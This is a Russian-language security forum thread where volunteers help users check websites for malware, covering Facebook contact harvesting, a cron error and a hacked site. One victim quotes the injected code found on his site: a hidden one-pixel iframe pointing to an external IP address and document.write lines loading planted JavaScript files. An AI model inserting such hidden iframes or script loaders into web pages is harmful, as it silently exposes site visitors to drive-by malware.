Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

akok

Команда форума
Администратор
Сообщения
16,222
Реакции
12,918
Баллы
2,203
  • Первое сообщение
  • #1
Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
  1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
  2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например http://safezone.cc - нужно писать как хттп://safezone.cc)
  3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
  4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.
*Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
 

regist

гоняюсь за туманом
Ассоциация VN/VIP
VIP
Разработчик
Сообщения
12,326
Реакции
5,905
Баллы
998
Сайт знает мои персональные данные, взяв их из сети facebook. Ясно, что facebook о конфиденциальности данных особо не беспокоится.
у меня нет фейсбука и никогда не было :p, но иногда приходят сообщения от него. Уже точно не помню, но кажется, что кто-то там меня хочет в друзья добавить :rolleyes:
 

shestale

Ассоциация VN/VIP
Преподаватель
Сообщения
9,696
Реакции
4,999
Баллы
663
Dragokas, есть один детект у Norman на Redirector.KV, больше пока ни чего сказать не могу, так как сегодня у меня с интернетом проблемы...на страничке есть ссылки на .js, скачай и посмотри, ты же в них разбираешься ;)
 

orderman

Ветеран
Сообщения
1,170
Реакции
1,361
Баллы
563
regist, если не ошибаюсь, то на фейсбуке есть возможность пригласить друзей используя адресную книгу почтового ящика. Так что если у кого-то из друзей есть ваш адрес, то от него и письмо;)
 

akok

Команда форума
Администратор
Сообщения
16,222
Реакции
12,918
Баллы
2,203
Хотелось бы немного информации о вероятности кражи данных аккаунта при переходе по этой ссылке,
и степени других видов опасности - дальнейший спам и пр.
Сайт знает мои персональные данные, взяв их из сети facebook. Ясно, что facebook о конфиденциальности данных особо не беспокоится.
Тут может быть все, от банального фишинга, до "упаривания" зловреда.
 

Phoenix

Активный пользователь
Сообщения
2,109
Реакции
2,058
Баллы
433
Dragokas,конечный сайт - hттp://postila.ru/ ,ваша ссылка это реферал (имхо но твёрдое :)) то есть, если товары купят (или что там) по этой ссылке, то хозяину реферала бонус.
Кстати, вы уже видели новый сервис http://vms.drweb.com/online/ (только не смейтесь, проверьте ссылку, сервис классный ;))
перенаправляет на
hттp://postila.ru/user/lp/m/хххххххххххххххххххххххххххх/h/b69741837863417d3dffdg61e97f7?email=2c930afa59bdgdg9db2c441cac4516ed5

(hттp://my.mail.ru/mail/хххххххххххххх - существует)
Я подставил мёртвый адрес и редиректнулся.
 
Последнее редактирование модератором:

regist

гоняюсь за туманом
Ассоциация VN/VIP
VIP
Разработчик
Сообщения
12,326
Реакции
5,905
Баллы
998
Phoenix, читаем шапку темы и не всталяем на форуме активные потенциально вредоносные ссылки!

UPD
. ссылки выше подправил убрав личную информацию.
 
Последнее редактирование:

Dragokas

Very kind Developer
Команда форума
Супер-Модератор
Разработчик
Клуб переводчиков
Сообщения
6,011
Реакции
5,815
Баллы
648
Phoenix, просьба также предварительно согласовывать выкладывание в открытый доступ дешифрованных персональных данных.
Спасибо.
 

SNS-amigo

SNS System Watch Freelance reporter
Сообщения
5,191
Реакции
8,476
Баллы
793
иногда приходят сообщения от него. Уже точно не помню, но кажется, что кто-то там меня хочет в друзья добавить
Сайт знает мои персональные данные, взяв их из сети facebook. Ясно, что facebook о конфиденциальности данных особо не беспокоится.
Это немного не так. Там есть предлагаемая возможность пригласить друзей и абонентов, используя ваш адрес email, который был введен при регистрации на FB. С точки зрения тех.администрации это простой процесс создать аудиторию для себя лично и для созданных вами групп.
Действует этот так. Предложение "Пригласите друзей, используя email" вылезает очень часто, кто-то по незнанию или по осознанному желанию ответил на это предложение и ввел пароль от своей почты в предлагаемое поле. После этого FB автоматом авторизуется в его почте, считывает там адресную книгу — контакты адресатов и абонентов, которые вам присылали почту и получали её от вас.



Не скажу, что FB самая защищенная сеть, но конфиденциальности там уделяется немало времени. Именно из-за этого FB довольно "туг на ухо". Но имеется возможность защищить свою учетную запись специальными решениями разработчиков средств безопасности. Это можно, например, сделать из программ Norton, или подключить специальное приложение Norton Safe Web, чтобы выполнялся Norton Auto-Scan.

 

SNS-amigo

SNS System Watch Freelance reporter
Сообщения
5,191
Реакции
8,476
Баллы
793
Забыл сказать, что для того, чтобы подключить специальное приложение Norton Safe Web, не обязательно быть пользователем программ Нортон. Но именно это приложение действует наиболее эффективно в плане защиты и фильтрации спама. Потому у тебя нет ни спама, не левых поползновений и никто не жалуется на твою учетку, действующую самовольно.
Вот страница самого приложения NSW в FB: https://apps.facebook.com/nortonsafeweb/
А вот другие приложения (игры, календарь и пр. пр.) после подключения к вам получают монопольный доступ к вашему аккаунту и от вашего имени могут рассылать приглашения. Впрочем, так не только в FB, но только FB честно предупреждает об этом при добавлении приложения. В других соц.сетях этого предупреждения может и не быть, а суть та же, приложение будет надоедать и спамить за вас.
 
Последнее редактирование:

Ekliptika

Активный пользователь
Сообщения
2
Реакции
0
Баллы
171
Добрый день!

Сегодня пришло на почту следующее письмо:
Отправитель: "Voicemail" <admin@ledgo.ru>
Тема: [VIRUS] Voicemail Message
Дата: 18 ноября 2013 г., 13:04:11 GMT+4
Получатель: maslov@ledgo.ru

The attached message from Voicemail <admin@ledgo.ru>
was found to contain the virus "Sanesecurity.Malware.22801.ZipHeur.UNOFFICIAL(7cc92d5b83b12 b9ddb82abd377e9f992:7106)".
The infected portion of the message was removed by Virus Blocker.
Значит ли это, что на сайте появился новый вирус?

Сайт ledgo.ru.

А еще постоянно (с интервалом 15 минут) приходят на почту письма такого содержания:
Отправитель: root@bitrix118.timeweb.ru (Cron Daemon)
Тема: Cron <talipov@bitrix118> /usr/local/bin/php /home/t/talipov/mega-shara/public_html/autobacup.php
Дата: 15 ноября 2013 г., 13:15:01 GMT+4
Получатель: ilgam@ledgo.ru

Could not open input file: /home/t/talipov/mega-shara/public_html/autobacup.php
Что это и как с этим бороться?
 
Последнее редактирование:

akok

Команда форума
Администратор
Сообщения
16,222
Реакции
12,918
Баллы
2,203
Тема: Cron <talipov@bitrix118> /usr/local/bin/php /home/t/talipov/mega-shara/public_html/autobacup.php
Проверьте наличие файла, cron не может его найти и шлет ошибки.


Значит ли это, что на сайте появился новый вирус?
Не факт, проверьте, что рассылает форум. Срабатывание идет именно на почтовые сообщения.
 

S10

Активный пользователь
Сообщения
23
Реакции
3
Баллы
303
Привет, друзья. Вновь обращаюсь к вам за подсказкой в поиске вредоносного кода...
Гугл считает сайт зараженным. Помогите, плиз, отыскать заразу.
Причём непонятно как вредоносный код мог попасть на сайт, если к сайту блокирован доступ по ФТП...

Сайт хттп://rhl-mod.ru
 

S10

Активный пользователь
Сообщения
23
Реакции
3
Баллы
303
regist, я всю эту информацию от гугла изучил и мне понятно, что сайт взломали с целью распространения чего-то вредоносного. Но вот на какие кокретно строки в коде идёт реакция от гугла? Надеюсь, что мне профи подскажут...
 

S10

Активный пользователь
Сообщения
23
Реакции
3
Баллы
303
Спасибо!
Опять счётчик) Помню однажды этот счётчик меня уже подводил, но не думаю что только в счётчике дело, т.к Akok правильно предположил что на сайте может быть шелл.

Сам я не бездействую ни в коем случае, у меня вот такая информация:
В некоторые страницы и скрипты сайта в конец дописывали такую строку:
document.write('<iframe src="хттп://5.63.152.144/?id=1" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>');

Также вызывались ещё подсаженные js
;document.write("<scr"+"ipt src='/images/regimage/backgrounds/dbzgt.js'><"+"/script>");
;document.write("<scr"+"ipt src='/images/pagination/alley.js'><"+"/script>");
Если надо - могу содержание этих js выложить, там много кода

Сейчас я это вычистил, левые js удалил. Но я уверен что это всё появится снова. Найти шелл пока не получается, т.к ищу вручную, а файлов довольно много. Вирус судя по всему какой-то злостный, а я далеко не матёрый борец с вирусами)
 
Последнее редактирование:

regist

гоняюсь за туманом
Ассоциация VN/VIP
VIP
Разработчик
Сообщения
12,326
Реакции
5,905
Баллы
998
S10, ещё подозрительно что при попытке зайти на ваш сайт (хттп://rhl-mod.ru) подряд происходит два редиректа (сначала на rhl-mod.ru/content.php?s=f9cb94c2f7b20cb8d469af93737a3a95 потом на rhl-mod.ru/content) - .htaccess рекомендую проверить, а так никакого shell-a не заметил там.
 
Последнее редактирование:

S10

Активный пользователь
Сообщения
23
Реакции
3
Баллы
303
Да, парни, счётчики я убрал пока что. Но это тоже тема для разговора почему собсно коды счётчиков заражаются... Это же лайвинтернет - безобидный сервис по идее... Второй раз такое со счётчиками. Причём в первом случае ругался только яндекс, теперь только гугл)
---------------
regist, может содержимое хтакцесс прислать? Но в таком виде там такие редиректы не прописаны. Это обилие букв после content.php - это может быть какая-нибудь вирусоопасная зашифровка?
 
Сверху Снизу